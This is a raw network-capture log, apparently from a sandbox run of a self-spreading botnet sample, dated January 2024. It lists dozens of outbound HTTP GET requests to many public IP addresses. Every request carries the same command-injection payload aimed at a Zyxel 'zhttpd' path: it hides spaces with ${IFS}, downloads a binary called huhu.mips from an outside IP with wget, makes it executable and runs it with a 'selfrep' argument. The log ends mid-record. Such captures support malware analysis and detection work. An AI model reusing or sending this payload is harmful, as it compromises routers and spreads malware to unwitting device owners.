                                                Jan 29, 2024 07:07:56.506392956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6506192.168.2.2344946136.6.143.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.506433964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6507192.168.2.235708652.122.212.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.506472111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6508192.168.2.2340448144.54.68.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.506515026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6509192.168.2.2349704120.136.105.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.506531954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6510192.168.2.235731266.89.88.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.506573915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6511192.168.2.2351410177.102.28.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.506628036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6512192.168.2.235614441.154.144.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.506649017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6513192.168.2.235096088.37.30.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.506700993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6514192.168.2.234119649.201.95.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.506751060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6515192.168.2.2348570138.44.82.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.506783962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6516192.168.2.2350192112.154.115.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.506822109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6517192.168.2.234103050.245.3.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.506871939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6518192.168.2.2358984144.29.129.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.506887913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6519192.168.2.2360700157.231.240.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.506943941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6520192.168.2.233995288.245.85.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.506973028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6521192.168.2.2334214188.166.159.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.507000923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6522192.168.2.234930477.88.240.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.507061005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6523192.168.2.2354586211.228.52.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.507103920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6524192.168.2.2340102143.57.18.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.507127047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6525192.168.2.2334270185.239.214.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.507159948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6526192.168.2.234291659.156.50.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.507205963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6527192.168.2.23365281.163.99.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.507255077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6528192.168.2.233588693.38.250.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.507272959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6529192.168.2.234982027.13.202.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.507319927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6530192.168.2.234645224.132.149.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.507344007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6531192.168.2.233462665.142.199.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.507440090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6532192.168.2.2343880112.161.72.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.507469893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6533192.168.2.233464276.26.19.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.507505894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6534192.168.2.235768864.177.133.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.507550001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6535192.168.2.2340784130.84.172.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.507599115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6536192.168.2.2354572146.25.80.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.507620096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6537192.168.2.2347292167.13.110.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.507656097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6538192.168.2.2344244218.229.154.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.507703066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6539192.168.2.235688412.89.176.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.507747889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6540192.168.2.235550670.41.38.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.507787943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6541192.168.2.2351232204.78.207.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.507817030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6542192.168.2.2335154114.20.117.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.507858038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6543192.168.2.2335272128.24.134.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.507882118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6544192.168.2.23366389.90.246.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.507915020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6545192.168.2.2356510209.87.123.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.507956028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6546192.168.2.23332169.239.137.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.507991076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6547192.168.2.2338988165.142.2.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.508013964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6548192.168.2.2346200142.28.98.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.508074999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6549192.168.2.2350310161.61.63.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.508121967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6550192.168.2.234022617.198.167.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.508171082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6551192.168.2.2357982223.91.101.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.508213043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6552192.168.2.2344180221.225.65.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.508240938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6553192.168.2.234353441.83.241.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.512104034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6554192.168.2.2339222192.213.43.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.512131929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6555192.168.2.2358570218.213.40.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.512181044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6556192.168.2.2356170190.233.45.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.512248039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6557192.168.2.2334746167.118.248.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.512279987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6558192.168.2.2356700223.5.18.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.512306929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6559192.168.2.2344088223.37.216.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.512356043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6560192.168.2.234079695.18.204.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.512384892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6561192.168.2.2358252113.138.253.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.512420893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6562192.168.2.234504036.179.68.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.512453079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6563192.168.2.2356306156.0.31.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.512505054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6564192.168.2.2348246138.101.44.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.512550116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6565192.168.2.233869640.80.165.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.512587070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6566192.168.2.235146250.122.204.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.512687922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6567192.168.2.2360652144.248.181.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.512696028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6568192.168.2.234758298.120.134.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.512742043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6569192.168.2.2354072203.229.248.113443
                                                TimestampBytes transferredDirectionData
